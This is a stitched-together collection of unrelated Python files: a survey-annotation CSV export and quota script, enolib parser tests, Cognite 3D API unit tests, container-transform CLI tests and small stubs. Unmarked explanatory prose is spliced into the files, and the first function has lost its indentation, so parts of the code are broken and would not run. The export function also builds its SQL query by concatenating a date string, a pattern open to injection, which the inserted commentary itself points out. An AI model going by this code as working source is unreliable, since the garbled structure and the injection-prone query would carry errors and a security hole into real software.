def to_csv_all_annotations(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
fieldnames = ['survey_record_id', 'created_at', 'words', 'group_id', 'quiz_left_high', 'quiz_left_middle', 'quiz_left_low', 'quiz_right_high', 'quiz_right_middle', 'quiz_right_low', 'quiz_center_high', 'quiz_center_middle', 'quiz_center_low', 'annotation_biased_article', 'annotation_bias_detection', 'annotation_bias_facts', 'annotation_tool_article_ideology', 'political']
t = PrettyTable(fieldnames)
    with open('annotations_mturk_{}.csv'.format(after_date), mode='w', newline='') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
count = 0
sql_str = """
SELECT survey_record_id, created_at, words, group_id, quiz_left_high, quiz_left_middle, quiz_left_low, quiz_right_high, quiz_right_middle, quiz_right_low, quiz_center_high, quiz_center_middle, quiz_center_low, annotation_biased_article, annotation_bias_detection, annotation_bias_facts, annotation_tool_article_ideology, political
FROM survey_annotations
WHERE created_at > '""" + after_date + """'
ORDER BY created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
record = dict(row)
survey_record_id = record['survey_record_id']
created_at = record['created_at']
words = record['words']
group_id = record['group_id']
quiz_left_high = SimpleChoice.query.get(record['quiz_left_high']).to_dict()['text']
quiz_left_middle = SimpleChoice.query.get(record['quiz_left_middle']).to_dict()['text']
quiz_left_low = SimpleChoice.query.get(record['quiz_left_low']).to_dict()['text']
quiz_right_high = SimpleChoice.query.get(record['quiz_right_high']).to_dict()['text']
quiz_right_middle = SimpleChoice.query.get(record['quiz_right_middle']).to_dict()['text']
quiz_right_low = SimpleChoice.query.get(record['quiz_right_low']).to_dict()['text']
quiz_center_high = SimpleChoice.query.get(record['quiz_center_high']).to_dict()['text']
quiz_center_middle = SimpleChoice.query.get(record['quiz_center_middle']).to_dict()['text']
quiz_center_low = SimpleChoice.query.get(record['quiz_center_low']).to_dict()['text']
annotation_biased_article = SimpleChoice.query.get(record['annotation_biased_article']).to_dict()['text']
annotation_bias_facts = SimpleChoice.query.get(record['annotation_bias_facts']).to_dict()['text']
annotation_bias_detection = SimpleChoice.query.get(record['annotation_bias_detection']).to_dict()['text']
annotation_tool_article_ideology = record['annotation_tool_article_ideology']
political = record['political']
writer.writerow({
'survey_record_id': survey_record_id,
'created_at': created_at,
'words': words,
'group_id': group_id,
'annotation_biased_article': annotation_biased_article,
'annotation_bias_facts': annotation_bias_facts,
'annotation_bias_detection': annotation_bias_detection,
'annotation_tool_article_ideology': annotation_tool_article_ideology,
'quiz_left_high': quiz_left_high,
'quiz_left_middle': quiz_left_middle,
'quiz_left_low': quiz_left_low,
'quiz_right_high': quiz_right_high,
'quiz_right_middle': quiz_right_middle,
'quiz_right_low': quiz_right_low,
'quiz_center_high': quiz_center_high,
'quiz_center_middle': quiz_center_middle,
'quiz_center_low': quiz_center_low,
'political' : political
})
count += 1
t.add_row([survey_record_id, created_at, words, group_id, quiz_left_high, quiz_left_middle, quiz_left_low, quiz_right_high, quiz_right_middle, quiz_right_low, quiz_center_high, quiz_center_middle, quiz_center_low, annotation_biased_article, annotation_bias_detection, annotation_bias_facts, annotation_tool_article_ideology, political])
print('csv generated...')
# print(t)
print("\n{} results. ".format(count))
ctx.pop()
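Building the `WHERE` clause by concatenating `after_date` into the SQL string is fragile: a stray quote breaks the statement, and attacker-controlled input becomes SQL injection. Bound parameters avoid both. A sketch with the standard-library `sqlite3` driver (the table is a stand-in, not the real `survey_annotations` schema):

```python
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE annotations (id INTEGER, created_at TEXT)')
conn.executemany(
    'INSERT INTO annotations VALUES (?, ?)',
    [(1, '2020-01-01'), (2, '2021-06-15')],
)

# The driver transmits after_date as a value; it is never pasted into the
# SQL text, so quoting and injection problems cannot arise.
after_date = '2020-12-31'
rows = conn.execute(
    'SELECT id FROM annotations WHERE created_at > ? ORDER BY created_at',
    (after_date,),
).fetchall()
print(rows)  # only the row newer than after_date
```

SQLAlchemy's `text()` offers the same mechanism with named `:after_date` placeholders.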


def get_groups_status(db, ctx):
    ctx.push()
    # Get all groups
    all_groups = [row.id for row in SurveyGroups.query.with_entities(SurveyGroups.id).all()]
    sql_str = """
        SELECT identifier_key, survey_record_id, sentence_group_id, survey_record.created_at, COUNT(*) as count
        FROM survey_annotations
        INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
        WHERE (SELECT COUNT(*) FROM survey_annotations WHERE survey_annotations.words = '' AND survey_annotations.label = 49 AND survey_annotations.survey_record_id = survey_record.id) >= 20
        GROUP BY survey_record_id
        ORDER BY survey_record.created_at;
    """
    sql = text(sql_str)
    empty_annotations = [dict(row) for row in db.session.execute(sql)]
    # Count, per sentence group, how many records consist only of empty annotations.
    empty_groups = {}
    for row in empty_annotations:
        key = row['sentence_group_id']
        if key is None:
            continue
        empty_groups[key] = empty_groups.get(key, 0) + 1
    # Get the current annotations
    sql = text('SELECT survey_record_id, sentence_group_id, COUNT(*) as count FROM survey_annotations GROUP BY survey_record_id')
    result = [dict(row) for row in db.session.execute(sql)]
    # If nothing is annotated yet
    if len(result) == 0:
        return all_groups
    # Filter the result and calculate annotated sentences' group frequency
    GROUP_SENTENCE_COUNT = 20
    grp_freq = {}
    for row in result:
        key = row['sentence_group_id']
        if key is None:
            continue
        if row['count'] >= GROUP_SENTENCE_COUNT:
            grp_freq[key] = grp_freq.get(key, 0) + 1
        else:
            grp_freq.setdefault(key, 0)
    # Discount records that were entirely empty.
    for key in grp_freq:
        if key in empty_groups:
            grp_freq[key] = grp_freq[key] - empty_groups[key]
    for key in sorted(grp_freq):
        print("%s: %s" % (key, grp_freq[key]))
    ordered_group_status = OrderedDict(sorted(grp_freq.items(), key=lambda item: item[1]))
    print('Ordered status => ')
    t_1 = PrettyTable(['group_id', 'current_quota'])
    for key in ordered_group_status:
        t_1.add_row([key, ordered_group_status[key]])
    print(t_1)
    persons = 0
    dfs = pd.read_excel('quotas14.08.xlsx', sheet_name=None)
    dfs = dfs['Sheet1']
    # print(dfs)
    df_1 = dfs[(dfs['survey_record_id'] < 10)]
    # print(df_1)
    df_2 = df_1['survey_record_id'].apply(recalc_quota)
    print(df_2)
    updated_quotas_dict = df_2.to_dict()
    print(updated_quotas_dict)
    # Copy the list so removals below do not mutate all_groups through a shared reference.
    all_groups_proxy = list(all_groups)
    for (key, value) in grp_freq.items():
        if value >= MAX_QUOTA:
            if int(key) in updated_quotas_dict:
                if value >= updated_quotas_dict[int(key)]:
                    all_groups_proxy.remove(int(key))
            else:
                all_groups_proxy.remove(int(key))
        else:
            persons = persons + (MAX_QUOTA - int(value))
    print('Available groups for annotation => {}'.format(len(all_groups_proxy)))
    print(all_groups_proxy)
    print('Number of people that can still take the survey => {}'.format(persons))
    if len(all_groups_proxy) == 0:
        print('WARNING: GROUP QUOTAS FULL!')
    # l = list(grp_freq.items())
    # l.sort()
    # print(dict(l))
    # count = 0
    # for (key, value) in dict(l).items():
    #     count += 1
    #     print("key: {} -- Value: {}".format(key, value))
    # print('{} results.'.format(count))


def recalc_quota(curr_quota):
    return MAX_QUOTA + (MAX_QUOTA - curr_quota)
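`recalc_quota` is simple shortfall arithmetic: with base quota m and current count c it returns m + (m - c), i.e. 2m - c, so an under-filled group's target grows by exactly its shortfall. A worked sketch (the `MAX_QUOTA` value here is assumed for illustration only):

```python
MAX_QUOTA = 10  # assumed value, for illustration only


def recalc_quota(curr_quota):
    # The shortfall (MAX_QUOTA - curr_quota) is added on top of the base quota.
    return MAX_QUOTA + (MAX_QUOTA - curr_quota)


print(recalc_quota(4))   # 4 of 10 filled -> new target 16
print(recalc_quota(10))  # already full -> target stays 10
```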
# def get_available_groups(db, ctx):
# ctx.push()
# engine = create_engine(SQLALCHEMY_DATABASE_URI, echo=False)
# sql = 'SELECT survey_record_id, label, words, factual, sentence_group_id, annotation_sentence_id FROM survey_annotations;'
# query = pd.read_sql(sql, engine)
# df_1 = pd.DataFrame(query, columns=['survey_record_id', 'label', 'words', 'factual', 'sentence_group_id', 'annotation_sentence_id'])
# df_1.to_csv ('export_dataframe.csv', index = False, header=True)
# print(df.head())
# print(df_1.count())
# df_1 = df_1[(df_1['words'].isnull()) & (df_1['label']=='Non-biased')]
# df_2 = df_1.groupby(["survey_record_id", "sentence_group_id"], as_index=False)["annotation_sentence_id"].nunique()
# print(df_new[df_new['annotation_sentence_id']==20])
# df_xx = df_new[df_new['annotation_sentence_id']==20]
# df_new_new = df_xx.groupby(["sentence_group_id"], as_index=False)["survey_record_id"].nunique()
# print(df_new_new)
# print(df.groupby("survey_record_id")["annotation_sentence_id"].nunique().to_frame())
# all_annotations = Annotations.query.all()
# print(len(all_annotations))
# for i in range(5):
# print(all_annotations[i])

10045d2504b913bdb9ac70d3ac53471ed42ecbce | 826 | py | Python | python/tests/generated/api/list/test_string_values.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | ["MIT"]

import enolib


def test_querying_existing_required_string_values_from_a_list_produces_the_expected_result():
    input = ("list:\n"
             "- item\n"
             "- item")

    output = enolib.parse(input).list('list').required_string_values()

    assert output == ['item', 'item']


def test_querying_existing_optional_string_values_from_a_list_produces_the_expected_result():
    input = ("list:\n"
             "- item\n"
             "- item")

    output = enolib.parse(input).list('list').optional_string_values()

    assert output == ['item', 'item']


def test_querying_missing_optional_string_values_from_a_list_produces_the_expected_result():
    input = ("list:\n"
             "-\n"
             "-")

    output = enolib.parse(input).list('list').optional_string_values()

    assert output == [None, None]
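The tests exercise enolib's required-vs-optional accessor contract: a required accessor must fail on a missing value, while the optional one returns `None`. The same contract can be sketched in plain Python (an illustration of the pattern, not enolib's actual implementation):

```python
class StringList:
    """Minimal stand-in for a parsed list element."""

    def __init__(self, values):
        self._values = values  # raw item values, None when an item is empty

    def required_string_values(self):
        # Required: any missing value is an error.
        for v in self._values:
            if v is None:
                raise ValueError('missing required value')
        return list(self._values)

    def optional_string_values(self):
        # Optional: missing values pass through as None.
        return list(self._values)


print(StringList(['item', 'item']).required_string_values())
print(StringList([None, None]).optional_string_values())
```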

1016a337a24da18c92ceb8d9c07ed91e665132b2 | 110 | py | Python | pypupil/synchonizer.py | choisuyeon/pypupil | 3fdb1f29c6b28613b6b39094c01e61560214daff | ["MIT"]

from queue import Queue
import threading


class Synchonizer:
    def __init__(self):
        return
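The `Synchonizer` stub imports `Queue` and `threading` but has no behavior yet; presumably it will hand data between threads. A minimal sketch of that producer/consumer pattern (the roles here are an assumption, not pypupil's actual design):

```python
import threading
from queue import Queue

q = Queue()


def producer():
    for sample in range(3):
        q.put(sample)  # hand each sample to the consumer thread
    q.put(None)        # sentinel: no more samples


def consumer(out):
    while True:
        sample = q.get()
        if sample is None:
            break
        out.append(sample)


received = []
t = threading.Thread(target=consumer, args=(received,))
t.start()
producer()
t.join()
print(received)  # samples arrive in FIFO order
```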

63edace6ba5deec89ff5bacfee310c93af809e03 | 112 | py | Python | Chapter1/1.3.7-Operators.py | pankace/SICP-robably | 765f516f253e96ae2c8e433722ea7cefd31b2f04 | ["MIT"]

import math
from operator import add, sub, mul
print(2 + 3)
print(mul(2, 3))
print(2 ** 5 + 54 + 4 * -43 / 55)

1200ff2883b0230b56100735ff2c358c888cff19 | 105 | py | Python | otherdave/util/__init__.py | BooGluten/OtherDave | 6b471f2aeb4f5c6deec263d98530fd583841e3dc | ["MIT"]

# OtherDave/otherdave/util/__init__.py
from .madlib import *
from .dlog import *
from .triggers import *
1214734c618b9a3089ef2351a5ab0970031b57f3 | 15,147 | py | Python | tests/tests_unit/test_api/test_3d.py | cognitedata/cognite-sdk-python | 7b80c0dfdb39461c7c7f0d63cfede1646d278732 | [
"Apache-2.0"
] | 59 | 2018-03-07T10:35:29.000Z | 2022-03-25T13:11:47.000Z | tests/tests_unit/test_api/test_3d.py | cognitedata/cognite-sdk-python | 7b80c0dfdb39461c7c7f0d63cfede1646d278732 | [
"Apache-2.0"
] | 768 | 2018-03-21T07:07:31.000Z | 2022-03-29T20:01:45.000Z | tests/tests_unit/test_api/test_3d.py | cognitedata/cognite-sdk-python | 7b80c0dfdb39461c7c7f0d63cfede1646d278732 | [
"Apache-2.0"
] | 24 | 2018-08-31T19:37:57.000Z | 2021-09-23T13:28:55.000Z | import re
import pytest

from cognite.client._api.three_d import (
    ThreeDAssetMapping,
    ThreeDAssetMappingList,
    ThreeDModel,
    ThreeDModelList,
    ThreeDModelRevision,
    ThreeDModelRevisionList,
    ThreeDModelRevisionUpdate,
    ThreeDModelUpdate,
    ThreeDNodeList,
)
from cognite.client.exceptions import CogniteAPIError
from tests.utils import jsgz_load


@pytest.fixture
def mock_3d_model_response(rsps, cognite_client):
    response_body = {"items": [{"name": "My Model", "id": 1000, "createdTime": 0}]}
    url_pattern = re.compile(re.escape(cognite_client.three_d._get_base_url_with_base_path()) + "/3d/models.*")
    rsps.add(rsps.POST, url_pattern, status=200, json=response_body)
    rsps.add(rsps.GET, url_pattern, status=200, json=response_body)
    rsps.assert_all_requests_are_fired = False
    yield rsps


@pytest.fixture
def mock_retrieve_3d_model_response(rsps, cognite_client):
    response_body = {"name": "My Model", "id": 1000, "createdTime": 0}
    rsps.add(
        rsps.GET, cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1", status=200, json=response_body
    )
    yield rsps
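The fixtures match request URLs with `re.compile(re.escape(base) + suffix)`. `re.escape` is what keeps metacharacters in the base URL (the dots in the hostname, for instance) from being treated as regex syntax, so only the trailing `.*` stays a live pattern. A stdlib-only sketch (the URLs are made up):

```python
import re

base = "https://api.example.com/api/v1/projects/my-project"  # made-up URL

# re.escape neutralises regex metacharacters in the base URL; without it,
# each "." in the hostname would match any character at all.
url_pattern = re.compile(re.escape(base) + "/3d/models.*")

print(bool(url_pattern.match(base + "/3d/models/123")))   # matches
print(bool(url_pattern.match(
    "https://apiXexample.com/api/v1/projects/my-project/3d/models")))  # rejected
```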


class Test3DModels:
    def test_list(self, cognite_client, mock_3d_model_response):
        res = cognite_client.three_d.models.list(published=True, limit=100)
        assert isinstance(res, ThreeDModelList)
        assert mock_3d_model_response.calls[0].response.json()["items"] == res.dump(camel_case=True)

    def test_list_published_default(self, cognite_client, mock_3d_model_response):
        res = cognite_client.three_d.models.list(limit=100)
        assert isinstance(res, ThreeDModelList)
        assert mock_3d_model_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
        assert "published" not in mock_3d_model_response.calls[0].request.path_url

    def test_update_with_update_object(self, cognite_client, mock_3d_model_response):
        update = ThreeDModelUpdate(id=1).name.set("bla")
        res = cognite_client.three_d.models.update(update)
        assert {"id": 1, "update": {"name": {"set": "bla"}}} == jsgz_load(mock_3d_model_response.calls[0].request.body)[
            "items"
        ][0]
        assert mock_3d_model_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)

    def test_update_with_resource_object(self, cognite_client, mock_3d_model_response):
        res = cognite_client.three_d.models.update(ThreeDModel(id=1, name="bla", created_time=123))
        assert {"id": 1, "update": {"name": {"set": "bla"}}} == jsgz_load(mock_3d_model_response.calls[0].request.body)[
            "items"
        ][0]
        assert mock_3d_model_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)

    def test_delete(self, cognite_client, mock_3d_model_response):
        res = cognite_client.three_d.models.delete(id=1)
        assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_response.calls[0].request.body)
        assert res is None

        res = cognite_client.three_d.models.delete(id=[1])
        assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_response.calls[1].request.body)
        assert res is None

    def test_retrieve(self, cognite_client, mock_retrieve_3d_model_response):
        res = cognite_client.three_d.models.retrieve(id=1)
        assert isinstance(res, ThreeDModel)
        assert mock_retrieve_3d_model_response.calls[0].response.json() == res.dump(camel_case=True)

    def test_create(self, cognite_client, mock_3d_model_response):
        res = cognite_client.three_d.models.create(name="My Model")
        assert isinstance(res, ThreeDModel)
        assert jsgz_load(mock_3d_model_response.calls[0].request.body) == {"items": [{"name": "My Model"}]}
        assert mock_3d_model_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)

    def test_create_multiple(self, cognite_client, mock_3d_model_response):
        res = cognite_client.three_d.models.create(name=["My Model"])
        assert isinstance(res, ThreeDModelList)
        assert jsgz_load(mock_3d_model_response.calls[0].request.body) == {"items": [{"name": "My Model"}]}
        assert mock_3d_model_response.calls[0].response.json()["items"] == res.dump(camel_case=True)


@pytest.fixture
def mock_3d_model_revision_response(rsps, cognite_client):
    response_body = {
        "items": [
            {
                "id": 1,
                "fileId": 1000,
                "published": False,
                "rotation": [0, 0, 0],
                "camera": {"target": [0, 0, 0], "position": [0, 0, 0]},
                "status": "Done",
                "thumbnailThreedFileId": 1000,
                "thumbnailUrl": "https://api.cognitedata.com/api/v1/project/myproject/3d/files/1000",
                "assetMappingCount": 0,
                "createdTime": 0,
            }
        ]
    }
    url_pattern = re.compile(
        re.escape(cognite_client.three_d._get_base_url_with_base_path()) + "/3d/models/1/revisions.*"
    )
    rsps.add(rsps.POST, url_pattern, status=200, json=response_body)
    rsps.add(rsps.GET, url_pattern, status=200, json=response_body)
    rsps.assert_all_requests_are_fired = False
    yield rsps


@pytest.fixture
def mock_retrieve_3d_model_revision_response(rsps, cognite_client):
    res = {
        "id": 1000,
        "fileId": 1000,
        "published": False,
        "rotation": [0, 0, 0],
        "camera": {"target": [0, 0, 0], "position": [0, 0, 0]},
        "status": "Done",
        "thumbnailThreedFileId": 1000,
        "thumbnailUrl": "https://api.cognitedata.com/api/v1/project/myproject/3d/files/1000",
        "assetMappingCount": 0,
        "createdTime": 0,
    }
    rsps.add(
        rsps.GET,
        cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1",
        status=200,
        json=res,
    )
    yield rsps


@pytest.fixture
def mock_3d_model_revision_thumbnail_response(rsps, cognite_client):
    rsps.add(
        rsps.POST,
        cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/thumbnail",
        status=200,
        json={},
    )
    yield rsps


@pytest.fixture
def mock_3d_model_revision_node_response(rsps, cognite_client):
    response_body = {
        "items": [
            {
                "id": 1,
                "treeIndex": 3,
                "parentId": 2,
                "depth": 2,
                "name": "Node name",
                "subtreeSize": 4,
                "boundingBox": {"max": [0, 0, 0], "min": [0, 0, 0]},
            }
        ]
    }
    rsps.add(
        rsps.GET,
        cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/nodes",
        status=200,
        json=response_body,
    )
    rsps.add(
        rsps.POST,
        cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/nodes/list",
        status=200,
        json=response_body,
    )
    rsps.add(
        rsps.GET,
        cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/nodes/ancestors",
        status=200,
        json=response_body,
    )
    rsps.assert_all_requests_are_fired = False
    yield rsps


class Test3DModelRevisions:
    def test_list(self, cognite_client, mock_3d_model_revision_response):
        res = cognite_client.three_d.revisions.list(model_id=1, published=True, limit=100)
        assert isinstance(res, ThreeDModelRevisionList)
        assert mock_3d_model_revision_response.calls[0].response.json()["items"] == res.dump(camel_case=True)

    def test_update_with_update_object(self, cognite_client, mock_3d_model_revision_response):
        update = ThreeDModelRevisionUpdate(id=1).published.set(False)
        cognite_client.three_d.revisions.update(1, update)
        assert {"id": 1, "update": {"published": {"set": False}}} == jsgz_load(
            mock_3d_model_revision_response.calls[0].request.body
        )["items"][0]

    def test_update_with_resource_object(self, cognite_client, mock_3d_model_revision_response):
        cognite_client.three_d.revisions.update(1, ThreeDModelRevision(id=1, published=False, created_time=123))
        assert {"id": 1, "update": {"published": {"set": False}}} == jsgz_load(
            mock_3d_model_revision_response.calls[0].request.body
        )["items"][0]

    def test_delete(self, cognite_client, mock_3d_model_revision_response):
        res = cognite_client.three_d.revisions.delete(1, id=1)
        assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_revision_response.calls[0].request.body)
        assert res is None

        res = cognite_client.three_d.revisions.delete(1, id=[1])
        assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_revision_response.calls[1].request.body)
        assert res is None

    def test_retrieve(self, cognite_client, mock_retrieve_3d_model_revision_response):
        res = cognite_client.three_d.revisions.retrieve(model_id=1, id=1)
        assert isinstance(res, ThreeDModelRevision)
        assert mock_retrieve_3d_model_revision_response.calls[0].response.json() == res.dump(camel_case=True)

    def test_create(self, cognite_client, mock_3d_model_revision_response):
        res = cognite_client.three_d.revisions.create(model_id=1, revision=ThreeDModelRevision(file_id=123))
        assert isinstance(res, ThreeDModelRevision)
        assert {"items": [{"fileId": 123}]} == jsgz_load(mock_3d_model_revision_response.calls[0].request.body)
        assert mock_3d_model_revision_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)

    def test_create_multiple(self, cognite_client, mock_3d_model_revision_response):
        res = cognite_client.three_d.revisions.create(model_id=1, revision=[ThreeDModelRevision(file_id=123)])
        assert isinstance(res, ThreeDModelRevisionList)
        assert {"items": [{"fileId": 123}]} == jsgz_load(mock_3d_model_revision_response.calls[0].request.body)
        assert mock_3d_model_revision_response.calls[0].response.json()["items"] == res.dump(camel_case=True)

    def test_update_thumbnail(self, cognite_client, mock_3d_model_revision_thumbnail_response):
        res = cognite_client.three_d.revisions.update_thumbnail(model_id=1, revision_id=1, file_id=1)
        assert {"fileId": 1} == jsgz_load(mock_3d_model_revision_thumbnail_response.calls[0].request.body)
        assert res is None

    def test_list_3d_nodes(self, cognite_client, mock_3d_model_revision_node_response):
        res = cognite_client.three_d.revisions.list_nodes(model_id=1, revision_id=1, node_id=None, depth=None, limit=10)
        assert isinstance(res, ThreeDNodeList)
        assert mock_3d_model_revision_node_response.calls[0].response.json()["items"] == res.dump(camel_case=True)

    def test_filter_3d_nodes(self, cognite_client, mock_3d_model_revision_node_response):
        res = cognite_client.three_d.revisions.filter_nodes(
            model_id=1, revision_id=1, properties={"Item": {"Type": ["Group"]}}, limit=10
        )
        assert isinstance(res, ThreeDNodeList)
        assert mock_3d_model_revision_node_response.calls[0].response.json()["items"] == res.dump(camel_case=True)

    def test_list_3d_ancestor_nodes(self, cognite_client, mock_3d_model_revision_node_response):
        res = cognite_client.three_d.revisions.list_ancestor_nodes(model_id=1, revision_id=1, node_id=None, limit=10)
        assert isinstance(res, ThreeDNodeList)
        assert mock_3d_model_revision_node_response.calls[0].response.json()["items"] == res.dump(camel_case=True)


class Test3DFiles:
    @pytest.fixture
    def mock_3d_files_response(self, cognite_client, rsps):
        rsps.add(rsps.GET, cognite_client.three_d._get_base_url_with_base_path() + "/3d/files/1", body="bla")

    def test_retrieve(self, cognite_client, mock_3d_files_response):
        assert b"bla" == cognite_client.three_d.files.retrieve(1)


class Test3DAssetMappings:
    @pytest.fixture
    def mock_3d_asset_mappings_response(self, cognite_client, rsps):
        response_body = {"items": [{"nodeId": 1003, "assetId": 3001, "treeIndex": 5, "subtreeSize": 7}]}
        url_pattern = re.compile(
            re.escape(cognite_client.three_d._get_base_url_with_base_path()) + "/3d/models/1/revisions/1/mappings.*"
        )
        rsps.add(rsps.GET, url_pattern, status=200, json=response_body)
        rsps.add(rsps.POST, url_pattern, status=200, json=response_body)
        rsps.assert_all_requests_are_fired = False
        yield rsps

    def test_list(self, cognite_client, mock_3d_asset_mappings_response):
        res = cognite_client.three_d.asset_mappings.list(
            model_id=1, revision_id=1, node_id=None, asset_id=None, limit=None
        )
        assert isinstance(res, ThreeDAssetMappingList)
        assert mock_3d_asset_mappings_response.calls[0].response.json()["items"] == res.dump(camel_case=True)

    def test_create(self, cognite_client, mock_3d_asset_mappings_response):
        res = cognite_client.three_d.asset_mappings.create(
            model_id=1, revision_id=1, asset_mapping=ThreeDAssetMapping(node_id=1, asset_id=1)
        )
        assert isinstance(res, ThreeDAssetMapping)
        assert mock_3d_asset_mappings_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)

    def test_create_multiple(self, cognite_client, mock_3d_asset_mappings_response):
        res = cognite_client.three_d.asset_mappings.create(
            model_id=1, revision_id=1, asset_mapping=[ThreeDAssetMapping(node_id=1, asset_id=1)]
        )
        assert isinstance(res, ThreeDAssetMappingList)
        assert mock_3d_asset_mappings_response.calls[0].response.json()["items"] == res.dump(camel_case=True)

    def test_delete(self, cognite_client, mock_3d_asset_mappings_response):
        res = cognite_client.three_d.asset_mappings.delete(
            model_id=1, revision_id=1, asset_mapping=ThreeDAssetMapping(1, 1)
        )
        assert res is None
        assert [{"nodeId": 1, "assetId": 1}] == jsgz_load(mock_3d_asset_mappings_response.calls[0].request.body)[
            "items"
        ]

    def test_delete_multiple(self, cognite_client, mock_3d_asset_mappings_response):
        res = cognite_client.three_d.asset_mappings.delete(
            model_id=1, revision_id=1, asset_mapping=[ThreeDAssetMapping(1, 1)]
        )
        assert res is None
        assert [{"nodeId": 1, "assetId": 1}] == jsgz_load(mock_3d_asset_mappings_response.calls[0].request.body)[
            "items"
        ]

    def test_delete_fails(self, cognite_client, rsps):
        rsps.add(
            rsps.POST,
            cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/mappings/delete",
            status=500,
            json={"error": {"message": "Server Error", "code": 500}},
        )
        with pytest.raises(CogniteAPIError) as e:
            cognite_client.three_d.asset_mappings.delete(
                model_id=1, revision_id=1, asset_mapping=[ThreeDAssetMapping(1, 1)]
            )
        assert e.value.unknown == [ThreeDAssetMapping._load({"assetId": 1, "nodeId": 1})]

124d0e00e9c8392947878d48f3822a6422db9898 | 70 | py | Python | tests/calculator/flow_test.py | goncalovalverde/seshat | deff5cdd985f81ac2b4ebd077eea11f7c4f4118f | ["MIT"]

import calculator.flow


def test_cycle_data():
    assert 1 + 1 == 2
89efb107bef859875443565658f4430dff6d3562 | 11,423 | py | Python | container_transform/tests/client_tests.py | psykzz/container-transform | 68223fae98f30b8bb2ce0f02ba9e58afbc80f196 | [
"MIT"
] | 1,141 | 2016-02-05T22:29:48.000Z | 2022-03-31T20:42:46.000Z | container_transform/tests/client_tests.py | psykzz/container-transform | 68223fae98f30b8bb2ce0f02ba9e58afbc80f196 | [
"MIT"
] | 62 | 2016-02-07T17:28:15.000Z | 2021-09-06T12:38:53.000Z | container_transform/tests/client_tests.py | psykzz/container-transform | 68223fae98f30b8bb2ce0f02ba9e58afbc80f196 | [
"MIT"
] | 138 | 2016-03-03T06:35:54.000Z | 2022-03-30T17:47:34.000Z | import os
import json

from unittest import TestCase

from click.testing import CliRunner

from container_transform.client import transform


class ClientTests(TestCase):
    """
    Tests for client
    """
    def setUp(self):
        self.yaml_input = (
            '\n'
            'web:\n'
            '  image: me/myapp\n'
            '  mem_limit: 1024b\n'
            '\n'
            'web2:\n'
            '  build: .\n'
            '  mem_limit: 1024b\n'
        )

    def test_prompt_compose_quiet(self):
        runner = CliRunner()
        with runner.isolated_filesystem():
            with open('docker-compose.yml', 'w') as f:
                f.write(self.yaml_input)
            result = runner.invoke(transform, ['docker-compose.yml', '-q'])
            assert result.exit_code == 0
            data = json.loads(result.output)
            self.assertIn(
                {
                    'name': 'web',
                    'image': 'me/myapp',
                    'memory': 4,
                    'essential': True
                },
                data['containerDefinitions'],
            )
            self.assertIn(
                {
                    'name': 'web2',
                    'memory': 4,
                    'essential': True
                },
                data['containerDefinitions'],
            )
    def test_prompt_fig_quiet(self):
        runner = CliRunner()
        with runner.isolated_filesystem():
            with open('fig.yml', 'w') as f:
                f.write(self.yaml_input)
            result = runner.invoke(transform, ['fig.yml', '-q'])
            assert result.exit_code == 0
            data = json.loads(result.output)
            self.assertIn(
                {
                    'name': 'web',
                    'image': 'me/myapp',
                    'memory': 4,
                    'essential': True
                },
                data['containerDefinitions'],
            )
            self.assertIn(
                {
                    'name': 'web2',
                    'memory': 4,
                    'essential': True
                },
                data['containerDefinitions'],
            )

    def test_prompt_fig_no_quiet(self):
        runner = CliRunner()
        with runner.isolated_filesystem():
            with open('fig.yml', 'w') as f:
                f.write(self.yaml_input)
            result = runner.invoke(transform, ['fig.yml', '--no-verbose'])
            assert result.exit_code == 0
            data = json.loads(result.output.split('\n')[0])
            messages = set(result.output.split('\n')[1:])
            self.assertEqual(
                {'Container web2 is missing required parameter "image".',
                 ''},
                messages
            )
            self.assertIn(
                {
                    'name': 'web',
                    'image': 'me/myapp',
                    'memory': 4,
                    'essential': True
                },
                data['containerDefinitions'],
            )
            self.assertIn(
                {
                    'name': 'web2',
                    'memory': 4,
                    'essential': True
                },
                data['containerDefinitions'],
            )
    def test_prompt_compose_systemd_quiet(self):
        runner = CliRunner()
        input_file = '{}/docker-compose-web.yml'.format(os.path.dirname(__file__))
        result = runner.invoke(transform, [input_file, '-q', '--output-type', 'systemd'])
        assert result.exit_code == 0
        service_file = '{}/web.service'.format(os.path.dirname(__file__))
        service_contents = open(service_file).read()
        self.assertEqual(
            result.output,
            service_contents
        )

    def test_prompt_marathon_compose_quiet(self):
        runner = CliRunner()
        input_file = '{}/marathon-test.json'.format(os.path.dirname(__file__))
        result = runner.invoke(
            transform,
            [input_file, '-q', '--input-type', 'marathon', '--output-type', 'compose'])
        assert result.exit_code == 0
        service_file = '{}/marathon-test-out.yaml'.format(os.path.dirname(__file__))
        service_contents = open(service_file).read()
        self.assertEqual(
            result.output,
            service_contents
        )

    def test_prompt_marathon_compose_group_quiet(self):
        runner = CliRunner()
        input_file = '{}/marathon-group.json'.format(os.path.dirname(__file__))
        result = runner.invoke(
            transform,
            [input_file, '-q', '--input-type', 'marathon', '--output-type', 'compose'])
        assert result.exit_code == 0
        service_file = '{}/marathon-group-out.yaml'.format(os.path.dirname(__file__))
        service_contents = open(service_file).read()
        self.assertEqual(
            result.output,
            service_contents
        )

    def test_prompt_marathon_compose_list_quiet(self):
        runner = CliRunner()
